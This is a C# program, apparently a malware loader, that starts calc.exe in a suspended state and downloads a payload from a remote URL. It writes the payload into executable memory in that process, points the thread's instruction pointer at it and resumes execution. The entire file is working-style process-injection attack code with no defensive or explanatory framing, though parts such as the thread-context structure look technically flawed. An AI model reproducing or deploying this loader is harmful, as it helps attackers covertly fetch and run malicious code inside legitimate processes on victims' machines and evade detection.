Payload memory injection

1. using System;
2. using System.Diagnostics;
3. using System.IO;
4. using System.Net.Http;
5. using System.Runtime.InteropServices;
6. using System.Text;
7. using System.Threading.Tasks;
8.  
9. class Program
10. {
11. // Constants
12. private const uint CREATE_SUSPENDED = 0x00000004;
13. private const uint CONTEXT_FULL = 0x10000B;
14. private const uint MEM_COMMIT = 0x1000;
15. private const uint MEM_RESERVE = 0x2000;
16. private const uint PAGE_EXECUTE_READWRITE = 0x40;
17.  
18. [StructLayout(LayoutKind.Sequential)]
19. public struct SECURITY_ATTRIBUTES
20. {
21. public uint nLength;
22. public IntPtr lpSecurityDescriptor;
23. public bool bInheritHandle;
24. }
25.  
26. [StructLayout(LayoutKind.Sequential)]
27. public struct PROCESS_INFORMATION
28. {
29. public IntPtr hProcess;
30. public IntPtr hThread;
31. public uint dwProcessId;
32. public uint dwThreadId;
33. }
34.  
35. [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]
36. public struct STARTUPINFO
37. {
38. public uint cb;
39. public string lpReserved;
40. public string lpDesktop;
41. public string lpTitle;
42. public uint dwX;
43. public uint dwY;
44. public uint dwXSize;
45. public uint dwYSize;
46. public uint dwXCountChars;
47. public uint dwYCountChars;
48. public uint dwFillAttribute;
49. public uint dwFlags;
50. public ushort wShowWindow;
51. public ushort cbReserved2;
52. public IntPtr lpReserved2;
53. public IntPtr hStdInput;
54. public IntPtr hStdOutput;
55. public IntPtr hStdError;
56. }
57.  
58. [StructLayout(LayoutKind.Sequential)]
59. public struct CONTEXT64
60. {
61. public ulong P1Home;
62. public ulong P2Home;
63. public ulong P3Home;
64. public ulong P4Home;
65. public ulong P5Home;
66. public ulong P6Home;
67. public uint ContextFlags;
68. public uint MxCsr;
69. public ushort SegCs;
70. public ushort SegDs;
71. public ushort SegEs;
72. public ushort SegFs;
73. public ushort SegGs;
74. public ushort SegSs;
75. public uint EFlags;
76. public ulong Dr0;
77. public ulong Dr1;
78. public ulong Dr2;
79. public ulong Dr3;
80. public ulong Dr6;
81. public ulong Dr7;
82. public ulong Rax;
83. public ulong Rcx;
84. public ulong Rdx;
85. public ulong Rbx;
86. public ulong Rsp;
87. public ulong Rbp;
88. public ulong Rsi;
89. public ulong Rdi;
90. public ulong R8;
91. public ulong R9;
92. public ulong R10;
93. public ulong R11;
94. public ulong R12;
95. public ulong R13;
96. public ulong R14;
97. public ulong R15;
98. public ulong Rip;
99. }
100.  
101. // P/Invoke
102. [DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
103. public static extern bool CreateProcess(
104. string lpApplicationName,
105. string lpCommandLine,
106. IntPtr lpProcessAttributes,
107. IntPtr lpThreadAttributes,
108. bool bInheritHandles,
109. uint dwCreationFlags,
110. IntPtr lpEnvironment,
111. string lpCurrentDirectory,
112. ref STARTUPINFO lpStartupInfo,
113. out PROCESS_INFORMATION lpProcessInformation);
114.  
115. [DllImport("kernel32.dll", SetLastError = true)]
116. public static extern bool GetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
117.  
118. [DllImport("kernel32.dll", SetLastError = true)]
119. public static extern bool ReadProcessMemory(
120. IntPtr hProcess,
121. IntPtr lpBaseAddress,
122. IntPtr lpBuffer,
123. uint nSize,
124. out IntPtr lpNumberOfBytesRead);
125.  
126. [DllImport("kernel32.dll", SetLastError = true)]
127. public static extern IntPtr VirtualAllocEx(
128. IntPtr hProcess,
129. IntPtr lpAddress,
130. uint dwSize,
131. uint flAllocationType,
132. uint flProtect);
133.  
134. [DllImport("kernel32.dll", SetLastError = true)]
135. public static extern bool WriteProcessMemory(
136. IntPtr hProcess,
137. IntPtr lpBaseAddress,
138. byte[] lpBuffer,
139. uint nSize,
140. out IntPtr lpNumberOfBytesWritten);
141.  
142. [DllImport("kernel32.dll", SetLastError = true)]
143. public static extern bool SetThreadContext(IntPtr hThread, ref CONTEXT64 lpContext);
144.  
145. [DllImport("kernel32.dll", SetLastError = true)]
146. public static extern uint ResumeThread(IntPtr hThread);
147.  
148. static async Task Main(string[] args)
149. {
150. string payloadUrl = "http://example.com/payload.exe"; // Replace with user input
151. string targetExe = @"C:\WINDOWS\System32\calc.exe";
152.  
153. try
154. {
155. // Step 1: Create the target process in a suspended state
156. var processInfo = CreateSuspendedProcess(targetExe);
157.  
158. // Step 2: Download the payload asynchronously
159. byte[] payloadData = await DownloadPayloadAsync(payloadUrl);
160.  
161. // Step 3: Inject payload into the target process
162. InjectPayload(processInfo, payloadData);
163.  
164. Console.WriteLine("Injection complete.");
165. }
166. catch (Exception ex)
167. {
168. Console.WriteLine($"Error: {ex.Message}");
169. }
170. }
171.  
172. private static PROCESS_INFORMATION CreateSuspendedProcess(string targetExe)
173. {
174. Console.WriteLine($"Starting {targetExe} in suspended state...");
175.  
176. STARTUPINFO startupInfo = new STARTUPINFO();
177. PROCESS_INFORMATION processInfo;
178.  
179. if (!CreateProcess(
180. null,
181. targetExe,
182. IntPtr.Zero,
183. IntPtr.Zero,
184. false,
185. CREATE_SUSPENDED,
186. IntPtr.Zero,
187. null,
188. ref startupInfo,
189. out processInfo))
190. {
191. throw new InvalidOperationException($"Error creating process: {Marshal.GetLastWin32Error()}");
192. }
193.  
194. return processInfo;
195. }
196.  
197. private static async Task<byte[]> DownloadPayloadAsync(string payloadUrl)
198. {
199. try
200. {
201. Console.WriteLine("Downloading payload...");
202. using (HttpClient client = new HttpClient())
203. {
204. return await client.GetByteArrayAsync(payloadUrl);
205. }
206. }
207. catch (Exception ex)
208. {
209. throw new InvalidOperationException($"Error downloading payload: {ex.Message}");
210. }
211. }
212.  
213. private static void InjectPayload(PROCESS_INFORMATION processInfo, byte[] payloadData)
214. {
215. CONTEXT64 context = new CONTEXT64 { ContextFlags = CONTEXT_FULL };
216. if (!GetThreadContext(processInfo.hThread, ref context))
217. {
218. throw new InvalidOperationException($"Error getting thread context: {Marshal.GetLastWin32Error()}");
219. }
220.  
221. // Step 1: Allocate memory in the target process
222. IntPtr allocatedMemory = VirtualAllocEx(
223. processInfo.hProcess,
224. IntPtr.Zero,
225. (uint)payloadData.Length,
226. MEM_COMMIT | MEM_RESERVE,
227. PAGE_EXECUTE_READWRITE);
228.  
229. if (allocatedMemory == IntPtr.Zero)
230. {
231. throw new InvalidOperationException($"Error allocating memory: {Marshal.GetLastWin32Error()}");
232. }
233.  
234. Console.WriteLine($"Memory allocated at {allocatedMemory}");
235.  
236. // Step 2: Write payload to the allocated memory
237. IntPtr bytesWritten;
238. if (!WriteProcessMemory(processInfo.hProcess, allocatedMemory, payloadData, (uint)payloadData.Length, out bytesWritten))
239. {
240. throw new InvalidOperationException($"Error writing payload: {Marshal.GetLastWin32Error()}");
241. }
242.  
243. // Step 3: Update the context with the new entrypoint (the allocated memory address)
244. context.Rip = (ulong)allocatedMemory;
245. if (!SetThreadContext(processInfo.hThread, ref context))
246. {
247. throw new InvalidOperationException($"Error setting thread context: {Marshal.GetLastWin32Error()}");
248. }
249.  
250. // Step 4: Resume the thread to start execution
251. if (ResumeThread(processInfo.hThread) == 0)
252. {
253. throw new InvalidOperationException($"Error resuming thread: {Marshal.GetLastWin32Error()}");
254. }
255.  
256. Console.WriteLine("Payload injected and process resumed.");
257. }
258. }